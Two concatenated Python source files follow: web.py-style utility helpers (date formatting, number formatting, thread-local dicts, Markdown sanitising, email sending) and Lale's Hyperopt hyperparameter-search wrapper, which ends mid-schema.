def restack(stack, index=0):
"""Returns the element at index after moving it to the top of stack.
>>> x = [1, 2, 3, 4]
>>> restack(x)
1
>>> x
[2, 3, 4, 1]
"""
x = stack.pop(index)
stack.append(x)
return x
def listget(lst, ind, default=None):
"""
Returns `lst[ind]` if it exists, `default` otherwise.
>>> listget(['a'], 0)
'a'
>>> listget(['a'], 1)
>>> listget(['a'], 1, 'b')
'b'
"""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""
    Returns `integer` as an int or `default` if it can't be converted.
>>> intget('3')
3
>>> intget('3a')
>>> intget('3a', 0)
0
"""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""
Converts a (UTC) datetime object to a nice string representation.
>>> from datetime import datetime, timedelta
>>> d = datetime(1970, 5, 1)
>>> datestr(d, now=d)
'0 microseconds ago'
>>> for t, v in {
... timedelta(microseconds=1): '1 microsecond ago',
... timedelta(microseconds=2): '2 microseconds ago',
... -timedelta(microseconds=1): '1 microsecond from now',
... -timedelta(microseconds=2): '2 microseconds from now',
... timedelta(microseconds=2000): '2 milliseconds ago',
... timedelta(seconds=2): '2 seconds ago',
... timedelta(seconds=2*60): '2 minutes ago',
... timedelta(seconds=2*60*60): '2 hours ago',
... timedelta(days=2): '2 days ago',
... }.iteritems():
... assert datestr(d, now=d+t) == v
>>> datestr(datetime(1970, 1, 1), now=d)
'January 1'
>>> datestr(datetime(1969, 1, 1), now=d)
'January 1, 1969'
>>> datestr(datetime(1970, 6, 1), now=d)
'June 1, 1970'
>>> datestr(None)
''
"""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not then: return ""
if not now: now = datetime.datetime.utcnow()
if type(now).__name__ == "DateTime":
now = datetime.datetime.fromtimestamp(now)
if type(then).__name__ == "DateTime":
then = datetime.datetime.fromtimestamp(then)
elif type(then).__name__ == "date":
then = datetime.datetime(then.year, then.month, then.day)
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def numify(string):
"""
Removes all non-digit characters from `string`.
>>> numify('800-555-1212')
'8005551212'
>>> numify('800.555.1212')
'8005551212'
"""
return ''.join([c for c in str(string) if c.isdigit()])
def denumify(string, pattern):
"""
Formats `string` according to `pattern`, where the letter X gets replaced
by characters from `string`.
>>> denumify("8005551212", "(XXX) XXX-XXXX")
'(800) 555-1212'
"""
out = []
for c in pattern:
if c == "X":
out.append(string[0])
string = string[1:]
else:
out.append(c)
return ''.join(out)
def commify(n):
"""
Add commas to an integer `n`.
>>> commify(1)
'1'
>>> commify(123)
'123'
>>> commify(1234)
'1,234'
>>> commify(1234567890)
'1,234,567,890'
>>> commify(123.0)
'123.0'
>>> commify(1234.5)
'1,234.5'
>>> commify(1234.56789)
'1,234.56789'
>>> commify('%.2f' % 1234.5)
'1,234.50'
>>> commify(None)
>>>
"""
if n is None: return None
n = str(n)
if '.' in n:
dollars, cents = n.split('.')
else:
dollars, cents = n, None
r = []
for i, c in enumerate(str(dollars)[::-1]):
if i and (not (i % 3)):
r.insert(0, ',')
r.insert(0, c)
out = ''.join(r)
if cents:
out += '.' + cents
return out
def dateify(datestring):
"""
Formats a numified `datestring` properly.
"""
return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
"""
Formats an ordinal.
Doesn't handle negative numbers.
>>> nthstr(1)
'1st'
>>> nthstr(0)
'0th'
>>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
>>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
>>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
['111th', '112th', '113th', '114th', '115th']
"""
assert n >= 0
if n % 100 in [11, 12, 13]: return '%sth' % n
return {1: '%sst', 2: '%snd', 3: '%srd'}.get(n % 10, '%sth') % n
def cond(predicate, consequence, alternative=None):
"""
Function replacement for if-else to use in expressions.
>>> x = 2
>>> cond(x % 2 == 0, "even", "odd")
'even'
>>> cond(x % 2 == 0, "even", "odd") + '_row'
'even_row'
"""
if predicate:
return consequence
else:
return alternative
class CaptureStdout:
"""
Captures everything `func` prints to stdout and returns it instead.
>>> def idiot():
... print "foo"
>>> capturestdout(idiot)()
'foo\\n'
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
>>> import time
>>> out, inf = profile(time.sleep)(.001)
>>> out
>>> inf[:10].strip()
'took 0.0'
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, os, tempfile ##, time already imported
f, filename = tempfile.mkstemp()
os.close(f)
prof = hotshot.Profile(filename)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
import cStringIO
out = cStringIO.StringIO()
stats = hotshot.stats.load(filename)
stats.stream = out
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(40)
stats.print_callers()
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += out.getvalue()
# remove the tempfile
try:
os.remove(filename)
except IOError:
pass
return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
>>> tryall(dict(j=lambda: True))
j: True
----------------------------------------
results:
True: 1
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict(threadlocal):
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
...
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
_instances = set()
def __init__(self):
ThreadedDict._instances.add(self)
def __del__(self):
ThreadedDict._instances.remove(self)
def __hash__(self):
return id(self)
def clear_all():
"""Clears all ThreadedDict instances.
"""
for t in ThreadedDict._instances:
t.clear()
clear_all = staticmethod(clear_all)
# Define all these methods to more or less fully emulate dict -- attribute access
# is built into threading.local.
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, value):
self.__dict__[key] = value
def __delitem__(self, key):
del self.__dict__[key]
def __contains__(self, key):
return key in self.__dict__
has_key = __contains__
def clear(self):
self.__dict__.clear()
def copy(self):
return self.__dict__.copy()
def get(self, key, default=None):
return self.__dict__.get(key, default)
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def iterkeys(self):
return self.__dict__.iterkeys()
iter = iterkeys
def values(self):
return self.__dict__.values()
def itervalues(self):
return self.__dict__.itervalues()
def pop(self, key, *args):
return self.__dict__.pop(key, *args)
def popitem(self):
return self.__dict__.popitem()
def setdefault(self, key, default=None):
return self.__dict__.setdefault(key, default)
def update(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def __repr__(self):
return '<ThreadedDict %r>' % self.__dict__
__str__ = __repr__
threadeddict = ThreadedDict
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
>>> self = storage()
>>> autoassign(self, dict(a=1, b=2))
>>> self
<Storage {'a': 1, 'b': 2}>
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
def to36(q):
"""
Converts an integer to base 36 (a useful scheme for human-sayable IDs).
>>> to36(35)
'z'
>>> to36(119292)
'2k1o'
>>> int(to36(939387374), 36)
939387374
>>> to36(0)
'0'
>>> to36(-393)
Traceback (most recent call last):
...
ValueError: must supply a positive integer
"""
if q < 0: raise ValueError, "must supply a positive integer"
letters = "0123456789abcdefghijklmnopqrstuvwxyz"
converted = []
while q != 0:
q, r = divmod(q, 36)
converted.insert(0, letters[r])
return "".join(converted) or '0'
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
from markdown import markdown
if text:
        text = text.replace('<', '&lt;')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
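# Illustrative usage of safemarkdown (a sketch; requires markdown.py to be importable):
#
#   html = safemarkdown("See http://example.com for *details*")
#   # raw '<' characters are escaped and the bare URL is wrapped in <...> so that
#   # markdown renders it as a link.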
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
"""
Sends the email message `message` with mail and envelope headers
    from `from_address` to `to_address` with `subject`.
Additional email headers can be specified with the dictionary
    `headers`.
Optionally cc, bcc and attachments can be specified as keyword arguments.
    Attachments must be an iterable; each attachment can be a filename,
    a file object, or a dictionary with `filename`, `content` and
    optionally `content_type` keys.
If `web.config.smtp_server` is set, it will send the message
to that SMTP server. Otherwise it will look for
`/usr/sbin/sendmail`, the typical location for the sendmail-style
binary. To use sendmail from a different path, set `web.config.sendmail_path`.
"""
attachments = kw.pop("attachments", [])
mail = _EmailMessage(from_address, to_address, subject, message, headers, **kw)
for a in attachments:
if isinstance(a, dict):
mail.attach(a['filename'], a['content'], a.get('content_type'))
elif hasattr(a, 'read'): # file
filename = os.path.basename(getattr(a, "name", ""))
content_type = getattr(a, 'content_type', None)
mail.attach(filename, a.read(), content_type)
elif isinstance(a, basestring):
f = open(a, 'rb')
content = f.read()
f.close()
filename = os.path.basename(a)
mail.attach(filename, content, None)
else:
raise ValueError, "Invalid attachment: %s" % repr(a)
mail.send()
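# Illustrative call to sendmail (a sketch with made-up addresses; delivery requires a
# configured SMTP server or a local sendmail binary):
#
#   sendmail('from@example.com', 'to@example.com', 'Report', 'See attachment.',
#            cc='cc@example.com',
#            attachments=[{'filename': 'report.txt', 'content': 'hello',
#                          'content_type': 'text/plain'}])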
class _EmailMessage:
def __init__(self, from_address, to_address, subject, message, headers=None, **kw):
def listify(x):
if not isinstance(x, list):
return [safestr(x)]
else:
return [safestr(a) for a in x]
subject = safestr(subject)
message = safestr(message)
from_address = safestr(from_address)
to_address = listify(to_address)
cc = listify(kw.get('cc', []))
bcc = listify(kw.get('bcc', []))
recipients = to_address + cc + bcc
import email.Utils
self.from_address = email.Utils.parseaddr(from_address)[1]
self.recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
self.headers = dictadd({
'From': from_address,
'To': ", ".join(to_address),
'Subject': subject
}, headers or {})
if cc:
self.headers['Cc'] = ", ".join(cc)
self.message = self.new_message()
self.message.add_header("Content-Transfer-Encoding", "7bit")
self.message.add_header("Content-Disposition", "inline")
self.message.add_header("MIME-Version", "1.0")
self.message.set_payload(message, 'utf-8')
self.multipart = False
def new_message(self):
from email.Message import Message
return Message()
def attach(self, filename, content, content_type=None):
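        # On the first attachment, wrap the existing single-part message in a
        # multipart/mixed container so the body and the attachments can both be carried.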
if not self.multipart:
msg = self.new_message()
msg.add_header("Content-Type", "multipart/mixed")
msg.attach(self.message)
self.message = msg
self.multipart = True
import mimetypes
try:
from email import encoders
except:
from email import Encoders as encoders
        content_type = content_type or mimetypes.guess_type(filename)[0] or "application/octet-stream"
msg = self.new_message()
msg.set_payload(content)
msg.add_header('Content-Type', content_type)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
if not content_type.startswith("text/"):
encoders.encode_base64(msg)
self.message.attach(msg)
def prepare_message(self):
for k, v in self.headers.iteritems():
if k.lower() == "content-type":
self.message.set_type(v)
else:
self.message.add_header(k, v)
self.headers = {}
def send(self):
try:
import webapi
except ImportError:
webapi = Storage(config=Storage())
self.prepare_message()
message_text = self.message.as_string()
if webapi.config.get('smtp_server'):
server = webapi.config.get('smtp_server')
port = webapi.config.get('smtp_port', 0)
username = webapi.config.get('smtp_username')
password = webapi.config.get('smtp_password')
debug_level = webapi.config.get('smtp_debuglevel', None)
starttls = webapi.config.get('smtp_starttls', False)
import smtplib
smtpserver = smtplib.SMTP(server, port)
if debug_level:
smtpserver.set_debuglevel(debug_level)
if starttls:
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if username and password:
smtpserver.login(username, password)
smtpserver.sendmail(self.from_address, self.recipients, message_text)
smtpserver.quit()
elif webapi.config.get('email_engine') == 'aws':
import boto.ses
c = boto.ses.SESConnection(
aws_access_key_id=webapi.config.get('aws_access_key_id'),
                aws_secret_access_key=webapi.config.get('aws_secret_access_key'))
            c.send_raw_email(self.from_address, message_text, self.recipients)
else:
sendmail = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
assert not self.from_address.startswith('-'), 'security'
for r in self.recipients:
assert not r.startswith('-'), 'security'
cmd = [sendmail, '-f', self.from_address] + self.recipients
if subprocess:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE)
p.stdin.write(message_text)
p.stdin.close()
p.wait()
else:
i, o = os.popen2(cmd)
                i.write(message_text)
i.close()
o.close()
del i, o
def __repr__(self):
return "<EmailMessage>"
def __str__(self):
return self.message.as_string()
if __name__ == "__main__":
import doctest
doctest.testmod()
|
hyperopt.py
|
# Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import sys
import time
import traceback
import warnings
from typing import Any, Dict, Optional
import hyperopt
import numpy as np
import pandas as pd
from hyperopt.exceptions import AllTrialsFailed
from sklearn.metrics import check_scoring, log_loss
from sklearn.model_selection import train_test_split
from sklearn.model_selection._split import check_cv
import lale.docstrings
import lale.helpers
import lale.operators
from lale.helpers import (
create_instance_from_hyperopt_search_space,
cross_val_score_track_trials,
)
from lale.lib.sklearn import LogisticRegression
from lale.search.op2hp import hyperopt_search_space
from lale.search.PGO import PGO
SEED = 42
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
class _HyperoptImpl:
def __init__(
self,
estimator=None,
max_evals=50,
frac_evals_with_defaults=0,
algo="tpe",
cv=5,
handle_cv_failure=False,
scoring=None,
best_score=0.0,
max_opt_time=None,
max_eval_time=None,
pgo: Optional[PGO] = None,
show_progressbar=True,
args_to_scorer=None,
verbose=False,
):
self.max_evals = max_evals
if estimator is None:
self.estimator = LogisticRegression()
else:
self.estimator = estimator
if frac_evals_with_defaults > 0:
self.evals_with_defaults = int(frac_evals_with_defaults * max_evals)
else:
self.evals_with_defaults = 0
self.algo = algo
self.scoring = scoring
if self.scoring is None:
is_clf = self.estimator.is_classifier()
if is_clf:
self.scoring = "accuracy"
else:
self.scoring = "r2"
self.best_score = best_score
self.handle_cv_failure = handle_cv_failure
self.cv = cv
self._trials = hyperopt.Trials()
self._default_trials = hyperopt.Trials()
self.max_opt_time = max_opt_time
self.max_eval_time = max_eval_time
self.pgo = pgo
self.show_progressbar = show_progressbar
if args_to_scorer is not None:
self.args_to_scorer = args_to_scorer
else:
self.args_to_scorer = {}
self.verbose = verbose
def _summarize_statuses(self):
status_list = self._trials.statuses()
status_hist = {}
for status in status_list:
status_hist[status] = 1 + status_hist.get(status, 0)
if hyperopt.STATUS_FAIL in status_hist:
print(
f"{status_hist[hyperopt.STATUS_FAIL]} out of {len(status_list)} trials failed, call summary() for details."
)
if not self.verbose:
print("Run with verbose=True to see per-trial exceptions.")
def fit(self, X_train, y_train):
opt_start_time = time.time()
is_clf = self.estimator.is_classifier()
self.cv = check_cv(self.cv, y=y_train, classifier=is_clf)
data_schema = lale.helpers.fold_schema(X_train, y_train, self.cv, is_clf)
self.search_space = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator, pgo=self.pgo, data_schema=data_schema
)
],
)
# Create a search space with default hyperparameters for all trainable parts of the pipeline.
# This search space is used for `frac_evals_with_defaults` fraction of the total trials.
try:
self.search_space_with_defaults = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator.freeze_trainable(),
pgo=self.pgo,
data_schema=data_schema,
)
],
)
except Exception:
logger.warning(
"Exception caught during generation of default search space, setting frac_evals_with_defaults to zero."
)
self.evals_with_defaults = 0
def hyperopt_train_test(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
try:
cv_score, logloss, execution_time = cross_val_score_track_trials(
trainable,
X_train,
y_train,
cv=self.cv,
scoring=self.scoring,
args_to_scorer=self.args_to_scorer,
)
logger.debug(
"Successful trial of hyperopt with hyperparameters:{}".format(
params
)
)
except BaseException as e:
# If there is any error in cross validation, use the score based on a random train-test split as the evaluation criterion
if self.handle_cv_failure:
(
X_train_part,
X_validation,
y_train_part,
y_validation,
) = train_test_split(X_train, y_train, test_size=0.20)
start = time.time()
trained = trainable.fit(X_train_part, y_train_part)
scorer = check_scoring(trainable, scoring=self.scoring)
cv_score = scorer(
trained, X_validation, y_validation, **self.args_to_scorer
)
execution_time = time.time() - start
y_pred_proba = trained.predict_proba(X_validation)
try:
logloss = log_loss(y_true=y_validation, y_pred=y_pred_proba)
except BaseException:
logloss = 0
logger.debug("Warning, log loss cannot be computed")
else:
logger.debug(e)
logger.debug(
"Error {} with pipeline:{}".format(e, trainable.to_json())
)
raise e
return cv_score, logloss, execution_time
def merge_trials(trials1, trials2):
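            # Merge trials2 into trials1, shifting each trial id (tid) past the current
            # maximum in trials1 so ids stay unique (used to fold the defaults-only run
            # into the main run).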
max_tid = max([trial["tid"] for trial in trials1.trials])
for trial in trials2:
tid = trial["tid"] + max_tid + 1
hyperopt_trial = hyperopt.Trials().new_trial_docs(
tids=[None], specs=[None], results=[None], miscs=[None]
)
hyperopt_trial[0] = trial
hyperopt_trial[0]["tid"] = tid
hyperopt_trial[0]["misc"]["tid"] = tid
for key in hyperopt_trial[0]["misc"]["idxs"].keys():
hyperopt_trial[0]["misc"]["idxs"][key] = [tid]
trials1.insert_trial_docs(hyperopt_trial)
trials1.refresh()
return trials1
def proc_train_test(params, X_train, y_train, return_dict):
return_dict["params"] = copy.deepcopy(params)
try:
score, logloss, execution_time = hyperopt_train_test(
params, X_train=X_train, y_train=y_train
)
return_dict["loss"] = self.best_score - score
return_dict["time"] = execution_time
return_dict["log_loss"] = logloss
return_dict["status"] = hyperopt.STATUS_OK
except BaseException as e:
exception_type = f"{type(e).__module__}.{type(e).__name__}"
try:
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trial_info = (
f'pipeline: """{trainable.pretty_print(show_imports=False)}"""'
)
except BaseException:
trial_info = f"hyperparams: {params}"
error_msg = f"Exception caught in Hyperopt: {exception_type}, {traceback.format_exc()}with {trial_info}"
logger.warning(error_msg + ", setting status to FAIL")
return_dict["status"] = hyperopt.STATUS_FAIL
return_dict["error_msg"] = error_msg
if self.verbose:
print(return_dict["error_msg"])
def get_final_trained_estimator(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trained = trainable.fit(X_train, y_train)
return trained
def f(params):
current_time = time.time()
if (self.max_opt_time is not None) and (
(current_time - opt_start_time) > self.max_opt_time
):
# if max optimization time set, and we have crossed it, exit optimization completely
sys.exit(0)
if self.max_eval_time:
                # Run hyperopt in a subprocess that can be interrupted
manager = multiprocessing.Manager()
proc_dict = manager.dict()
p = multiprocessing.Process(
target=proc_train_test, args=(params, X_train, y_train, proc_dict)
)
p.start()
p.join(self.max_eval_time)
if p.is_alive():
p.terminate()
p.join()
logger.warning(
f"Maximum alloted evaluation time exceeded. with hyperparams: {params}, setting status to FAIL"
)
proc_dict["status"] = hyperopt.STATUS_FAIL
if "status" not in proc_dict:
logger.warning("Corrupted results, setting status to FAIL")
proc_dict["status"] = hyperopt.STATUS_FAIL
else:
proc_dict = {}
proc_train_test(params, X_train, y_train, proc_dict)
return proc_dict
algo = getattr(hyperopt, self.algo)
# Search in the search space with defaults
if self.evals_with_defaults > 0:
try:
hyperopt.fmin(
f,
self.search_space_with_defaults,
algo=algo.suggest,
max_evals=self.evals_with_defaults,
trials=self._default_trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
raise ValueError(
"Error from hyperopt, none of the trials succeeded."
)
try:
hyperopt.fmin(
f,
self.search_space,
algo=algo.suggest,
max_evals=self.max_evals - self.evals_with_defaults,
trials=self._trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
self._summarize_statuses()
raise ValueError("Error from hyperopt, none of the trials succeeded.")
self._trials = merge_trials(self._trials, self._default_trials)
if self.show_progressbar:
self._summarize_statuses()
try:
best_trial = self._trials.best_trial
val_loss = self._trials.best_trial["result"]["loss"]
if len(self._default_trials) > 0:
default_val_loss = self._default_trials.best_trial["result"]["loss"]
if default_val_loss < val_loss:
best_trial = self._default_trials.best_trial
best_params = best_trial["result"]["params"]
logger.info(
"best score: {:.1%}\nbest hyperparams found using {} hyperopt trials: {}".format(
self.best_score - self._trials.average_best_error(),
self.max_evals,
best_params,
)
)
trained = get_final_trained_estimator(best_params, X_train, y_train)
self._best_estimator = trained
except BaseException as e:
logger.warning(
"Unable to extract the best parameters from optimization, the error: {}".format(
e
)
)
self._best_estimator = None
return self
def predict(self, X_eval):
import warnings
warnings.filterwarnings("ignore")
if self._best_estimator is None:
raise ValueError(
"Can not predict as the best estimator is None. Either an attempt to call `predict` "
"before calling `fit` or all the trials during `fit` failed."
)
trained = self._best_estimator
try:
predictions = trained.predict(X_eval)
except ValueError as e:
logger.warning(
"ValueError in predicting using Hyperopt:{}, the error is:{}".format(
trained, e
)
)
predictions = None
return predictions
def summary(self):
"""Table summarizing the trial results (ID, loss, time, log_loss, status).
Returns
-------
result : DataFrame"""
def make_record(trial_dict):
return {
"name": f'p{trial_dict["tid"]}',
"tid": trial_dict["tid"],
"loss": trial_dict["result"].get("loss", float("nan")),
"time": trial_dict["result"].get("time", float("nan")),
"log_loss": trial_dict["result"].get("log_loss", float("nan")),
"status": trial_dict["result"]["status"],
}
records = [make_record(td) for td in self._trials.trials]
result = pd.DataFrame.from_records(records, index="name")
return result
def get_pipeline(self, pipeline_name=None, astype="lale"):
"""Retrieve one of the trials.
Parameters
----------
pipeline_name : union type, default None
- string
Key for table returned by summary(), return a trainable pipeline.
- None
When not specified, return the best trained pipeline found.
astype : 'lale' or 'sklearn', default 'lale'
Type of resulting pipeline.
Returns
-------
result : Trained operator if best, trainable operator otherwise.
"""
best_name = None
if self._best_estimator is not None:
best_name = f'p{self._trials.best_trial["tid"]}'
if pipeline_name is None:
pipeline_name = best_name
if pipeline_name == best_name:
result = getattr(self, "_best_estimator", None)
else:
tid = int(pipeline_name[1:])
params = self._trials.trials[tid]["result"]["params"]
result = create_instance_from_hyperopt_search_space(self.estimator, params)
if result is None or astype == "lale":
return result
assert astype == "sklearn", astype
return result.export_to_sklearn_pipeline()
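# Illustrative use of summary() and get_pipeline() after fitting (a sketch; the
# variable names and data are assumptions, not part of this module):
#
#   trained = Hyperopt(estimator=LR, cv=3, max_evals=5).fit(X, y)
#   trained.summary()                  # DataFrame of per-trial loss/time/status
#   best = trained.get_pipeline()      # best trained pipeline found
#   p3 = trained.get_pipeline('p3')    # trainable pipeline from the trial with tid 3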
_hyperparams_schema = {
"allOf": [
{
"type": "object",
"required": [
"estimator",
"max_evals",
"cv",
"handle_cv_failure",
"max_opt_time",
"pgo",
"show_progressbar",
],
"relevantToOptimizer": ["estimator", "max_evals", "cv"],
"additionalProperties": False,
"properties": {
"estimator": {
"description": "Planned Lale individual operator or pipeline,\nby default LogisticRegression.",
"anyOf": [
{"laleType": "operator", "not": {"enum": [None]}},
{"enum": [None]},
],
"default": None,
},
"algo": {
"description": """Algorithm for searching the space.
Use 'rand' for random search,
'tpe' for tree of parzen estimators,
'atpe' for adaptive TPE,
'anneal' for variant on random search that takes some advantage of a smooth response surface.""",
"enum": ["rand", "tpe", "atpe", "anneal"],
"default": "tpe",
},
"max_evals": {
"description": "Number of trials of Hyperopt search.",
"type": "integer",
"minimum": 1,
"default": 50,
},
"frac_evals_with_defaults": {
"description": """Sometimes, using default values of hyperparameters works quite well.
This value would allow a fraction of the trials to use default values. Hyperopt searches the entire search space
for (1-frac_evals_with_defaults) fraction of max_evals.""",
"type": "number",
"minimum": 0.0,
"default": 0,
},
"cv": {
"description": """Cross-validation as integer or as object that has a split function.
The fit method performs cross validation on the input dataset for each
trial, and uses the mean cross validation performance for optimization.
This behavior is also impacted by handle_cv_failure flag.
If integer: number of folds in sklearn.model_selection.StratifiedKFold.
If object with split function: generator yielding (train, test) splits
as arrays of indices. Can use any of the iterators from
https://scikit-learn.org/stable/modules/cross_validation.html#cross-validation-iterators.""",
"anyOf": [
{"type": "integer"},
{"laleType": "Any", "forOptimizer": False},
],
"minimum": 1,
"default": 5,
},
"handle_cv_failure": {
"description": """How to deal with cross validation failure for a trial.
If True, continue the trial by doing an 80-20 percent train-validation
split of the dataset input to fit and report the score on the
validation part. If False, terminate the trial with FAIL status.""",
"type": "boolean",
"default": False,
},
"scoring": {
"description": """Scorer object, or known scorer named by string.
Default of None translates to `accuracy` for classification and `r2` for regression.""",
"anyOf": [
{
"description": """Custom scorer object created with `make_scorer`_.
The argument to make_scorer can be one of scikit-learn's metrics_,
or it can be a user-written Python function to create a completely
custom scorer object, following the `model_evaluation`_ example.
The metric has to return a scalar value. Note that scikit-learn's
scorer object always returns values such that higher score is
better. Since Hyperopt solves a minimization problem, we pass
(best_score - score) to Hyperopt.
.. _`make_scorer`: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html#sklearn.metrics.make_scorer.
.. _metrics: https://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
.. _`model_evaluation`: https://scikit-learn.org/stable/modules/model_evaluation.html
""",
"not": {"type": "string"},
},
{
"description": "Known scorer for classification task.",
"enum": [
"accuracy",
"explained_variance",
"max_error",
"roc_auc",
"roc_auc_ovr",
"roc_auc_ovo",
"roc_auc_ovr_weighted",
"roc_auc_ovo_weighted",
"balanced_accuracy",
"average_precision",
"neg_log_loss",
"neg_brier_score",
],
},
{
"description": "Known scorer for regression task.",
"enum": [
"r2",
"neg_mean_squared_error",
"neg_mean_absolute_error",
"neg_root_mean_squared_error",
"neg_mean_squared_log_error",
"neg_median_absolute_error",
],
},
],
"default": None,
},
"best_score": {
"description": """The best score for the specified scorer.
This allows us to return a loss to hyperopt that is >=0,
where zero is the best loss.""",
"type": "number",
"default": 0.0,
},
"max_opt_time": {
"description": "Maximum amout of time in seconds for the optimization.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"max_eval_time": {
"description": "Maximum amout of time in seconds for each evaluation.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"pgo": {
"anyOf": [{"description": "lale.search.PGO"}, {"enum": [None]}],
"default": None,
},
"show_progressbar": {
"description": "Display progress bar during optimization.",
"type": "boolean",
"default": True,
},
"args_to_scorer": {
"anyOf": [
{"type": "object"}, # Python dictionary
{"enum": [None]},
],
"description": """A dictionary of additional keyword arguments to pass to the scorer.
